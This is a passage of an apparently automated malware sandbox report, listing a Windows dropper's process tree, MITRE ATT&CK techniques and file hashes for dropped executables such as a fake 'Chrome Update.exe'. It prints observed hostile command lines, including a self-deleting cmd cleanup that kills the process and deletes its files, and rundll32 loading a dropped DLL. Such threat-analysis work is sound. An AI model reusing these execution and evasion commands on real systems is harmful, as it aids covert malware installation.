                                                                          • C:\Windows\SysWOW64\regedit.exe
                                                                            regedit /s adj.reg
                                                                            4⤵
                                                                            • Runs .reg file with regedit
                                                                            PID:6124
                                                                          • C:\Windows\SysWOW64\regedit.exe
                                                                            regedit /s adj2.reg
                                                                            4⤵
                                                                            • Runs .reg file with regedit
                                                                            PID:2376
                                                                        • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                          "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:3232
                                                                      • C:\Users\Admin\Documents\OmDJTTRpMHv1fkQaqE6f2zur.exe
                                                                        "C:\Users\Admin\Documents\OmDJTTRpMHv1fkQaqE6f2zur.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4692
                                                                        • C:\Users\Admin\Documents\OmDJTTRpMHv1fkQaqE6f2zur.exe
                                                                          "C:\Users\Admin\Documents\OmDJTTRpMHv1fkQaqE6f2zur.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks processor information in registry
                                                                          PID:2560
                                                                      • C:\Users\Admin\Documents\hlLElyzTg3fGBFX0uCo68RCI.exe
                                                                        "C:\Users\Admin\Documents\hlLElyzTg3fGBFX0uCo68RCI.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks processor information in registry
                                                                        PID:4912
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im hlLElyzTg3fGBFX0uCo68RCI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\hlLElyzTg3fGBFX0uCo68RCI.exe" & del C:\ProgramData\*.dll & exit
                                                                          3⤵
                                                                            PID:5932
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im hlLElyzTg3fGBFX0uCo68RCI.exe /f
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              PID:6100
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              4⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:5976
                                                                        • C:\Users\Admin\Documents\wfZupIH_GhAxMubdurfO8rRm.exe
                                                                          "C:\Users\Admin\Documents\wfZupIH_GhAxMubdurfO8rRm.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4084
                                                                          • C:\Users\Admin\Documents\wfZupIH_GhAxMubdurfO8rRm.exe
                                                                            C:\Users\Admin\Documents\wfZupIH_GhAxMubdurfO8rRm.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4332
                                                                        • C:\Users\Admin\Documents\1GvpHFBSLUK9912IxrF7hoKI.exe
                                                                          "C:\Users\Admin\Documents\1GvpHFBSLUK9912IxrF7hoKI.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          PID:684
                                                                        • C:\Users\Admin\Documents\llH1d5hPXk9AGUjg7EZqWt2L.exe
                                                                          "C:\Users\Admin\Documents\llH1d5hPXk9AGUjg7EZqWt2L.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:1636
                                                                          • C:\Users\Admin\Documents\llH1d5hPXk9AGUjg7EZqWt2L.exe
                                                                            C:\Users\Admin\Documents\llH1d5hPXk9AGUjg7EZqWt2L.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:5108
                                                                        • C:\Users\Admin\Documents\0A6Pidy7Ru1qnWMuFf_kqidI.exe
                                                                          "C:\Users\Admin\Documents\0A6Pidy7Ru1qnWMuFf_kqidI.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:3156
                                                                        • C:\Users\Admin\Documents\YcevC21pfyw4vYCoKx6IPZd0.exe
                                                                          "C:\Users\Admin\Documents\YcevC21pfyw4vYCoKx6IPZd0.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:4212
                                                                          • C:\Users\Admin\Documents\YcevC21pfyw4vYCoKx6IPZd0.exe
                                                                            "C:\Users\Admin\Documents\YcevC21pfyw4vYCoKx6IPZd0.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:4420
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 1232
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:5976
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 708
                                                                            3⤵
                                                                            • Program crash
                                                                            PID:5496
                                                                        • C:\Users\Admin\Documents\1p_KbKg1LWu6KqU53TSrOfQ0.exe
                                                                          "C:\Users\Admin\Documents\1p_KbKg1LWu6KqU53TSrOfQ0.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:4432
                                                                          • C:\Users\Admin\Documents\1p_KbKg1LWu6KqU53TSrOfQ0.exe
                                                                            "C:\Users\Admin\Documents\1p_KbKg1LWu6KqU53TSrOfQ0.exe" -a
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4172
                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        1⤵
                                                                          PID:3132
                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            2⤵
                                                                            • Process spawned unexpected child process
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2236
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3272
                                                                        • C:\Windows\winnetdriv.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626805084 0
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:4508
                                                                        • C:\Users\Admin\AppData\Local\Temp\6964.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\6964.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks processor information in registry
                                                                          PID:5372
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 6964.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6964.exe" & del C:\ProgramData\*.dll & exit
                                                                            2⤵
                                                                              PID:5252
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:4380
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im 6964.exe /f
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                PID:5744
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                3⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1648
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            1⤵
                                                                            • Loads dropped DLL
                                                                            PID:5760
                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            1⤵
                                                                            • Process spawned unexpected child process
                                                                            PID:5744
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                            1⤵
                                                                              PID:6012
                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              PID:2104
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                PID:5892
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 620
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:6020
                                                                            • C:\Users\Admin\AppData\Local\Temp\8DF5.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\8DF5.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4776
                                                                            • C:\Windows\system32\ApplicationFrameHost.exe
                                                                              C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:5796
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:1868
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4716
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4384
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              PID:5328
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:5348
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5800
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5216
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4200

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                            Persistence

                                                                            Modify Existing Service

                                                                            1
                                                                            T1031

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1060

                                                                            Defense Evasion

                                                                            Modify Registry

                                                                            4
                                                                            T1112

                                                                            Disabling Security Tools

                                                                            1
                                                                            T1089

                                                                            Virtualization/Sandbox Evasion

                                                                            1
                                                                            T1497

                                                                            Install Root Certificate

                                                                            1
                                                                            T1130

                                                                            Credential Access

                                                                            Credentials in Files

                                                                            4
                                                                            T1081

                                                                            Discovery

                                                                            Query Registry

                                                                            6
                                                                            T1012

                                                                            Virtualization/Sandbox Evasion

                                                                            1
                                                                            T1497

                                                                            System Information Discovery

                                                                            6
                                                                            T1082

                                                                            Peripheral Device Discovery

                                                                            1
                                                                            T1120

                                                                            Remote System Discovery

                                                                            1
                                                                            T1018

                                                                            Collection

                                                                            Data from Local System

                                                                            4
                                                                            T1005

                                                                            Command and Control

                                                                            Web Service

                                                                            1
                                                                            T1102

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\libcurl.dll
                                                                              MD5

                                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                                              SHA1

                                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                              SHA256

                                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                              SHA512

                                                                              857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\libcurlpp.dll
                                                                              MD5

                                                                              e6e578373c2e416289a8da55f1dc5e8e

                                                                              SHA1

                                                                              b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                              SHA256

                                                                              43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                              SHA512

                                                                              9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\libgcc_s_dw2-1.dll
                                                                              MD5

                                                                              9aec524b616618b0d3d00b27b6f51da1

                                                                              SHA1

                                                                              64264300801a353db324d11738ffed876550e1d3

                                                                              SHA256

                                                                              59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                              SHA512

                                                                              0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\libstdc++-6.dll
                                                                              MD5

                                                                              5e279950775baae5fea04d2cc4526bcc

                                                                              SHA1

                                                                              8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                              SHA256

                                                                              97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                              SHA512

                                                                              666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\libwinpthread-1.dll
                                                                              MD5

                                                                              1e0d62c34ff2e649ebc5c372065732ee

                                                                              SHA1

                                                                              fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                              SHA256

                                                                              509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                              SHA512

                                                                              3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\setup_install.exe
                                                                              MD5

                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                              SHA1

                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                              SHA256

                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                              SHA512

                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\setup_install.exe
                                                                              MD5

                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                              SHA1

                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                              SHA256

                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                              SHA512

                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.exe
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.exe
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.txt
                                                                              MD5

                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                              SHA1

                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                              SHA256

                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                              SHA512

                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_2.exe
                                                                              MD5

                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                              SHA1

                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                              SHA256

                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                              SHA512

                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_2.txt
                                                                              MD5

                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                              SHA1

                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                              SHA256

                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                              SHA512

                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_3.exe
                                                                              MD5

                                                                              ee658be7ea7269085f4004d68960e547

                                                                              SHA1

                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                              SHA256

                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                              SHA512

                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_3.txt
                                                                              MD5

                                                                              ee658be7ea7269085f4004d68960e547

                                                                              SHA1

                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                              SHA256

                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                              SHA512

                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_4.exe
                                                                              MD5

                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                              SHA1

                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                              SHA256

                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                              SHA512

                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_4.txt
                                                                              MD5

                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                              SHA1

                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                              SHA256

                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                              SHA512

                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_5.exe
                                                                              MD5

                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                              SHA1

                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                              SHA256

                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                              SHA512

                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_5.txt
                                                                              MD5

                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                              SHA1

                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                              SHA256

                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                              SHA512

                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_6.exe
                                                                              MD5

                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                              SHA1

                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                              SHA256

                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                              SHA512

                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_6.txt
                                                                              MD5

                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                              SHA1

                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                              SHA256

                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                              SHA512

                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                              MD5

                                                                              ba5a8020b3022821fd9510a50be8d004

                                                                              SHA1

                                                                              1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                              SHA256

                                                                              7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                              SHA512

                                                                              a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                              MD5

                                                                              ba5a8020b3022821fd9510a50be8d004

                                                                              SHA1

                                                                              1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                              SHA256

                                                                              7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                              SHA512

                                                                              a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                              MD5

                                                                              56bd0f698f28e63479e5697dd167926e

                                                                              SHA1

                                                                              a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                              SHA256

                                                                              6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                              SHA512

                                                                              f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                              MD5

                                                                              56bd0f698f28e63479e5697dd167926e

                                                                              SHA1

                                                                              a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                              SHA256

                                                                              6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                              SHA512

                                                                              f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                            • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                              MD5

                                                                              8ddd5b9dbcd4e37135868db27b675c2d

                                                                              SHA1

                                                                              9122af279871de3f92ac3728e2343950f3e8b995

                                                                              SHA256

                                                                              2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                              SHA512

                                                                              e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                            • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                              MD5

                                                                              8ddd5b9dbcd4e37135868db27b675c2d

                                                                              SHA1

                                                                              9122af279871de3f92ac3728e2343950f3e8b995

                                                                              SHA256

                                                                              2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                              SHA512

                                                                              e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                              MD5

                                                                              99ab358c6f267b09d7a596548654a6ba

                                                                              SHA1

                                                                              d5a643074b69be2281a168983e3f6bef7322f676

                                                                              SHA256

                                                                              586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                              SHA512

                                                                              952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                              MD5

                                                                              1c7be730bdc4833afb7117d48c3fd513

                                                                              SHA1

                                                                              dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                              SHA256

                                                                              8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                              SHA512

                                                                              7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              MD5

                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                              SHA1

                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                              SHA256

                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                              SHA512

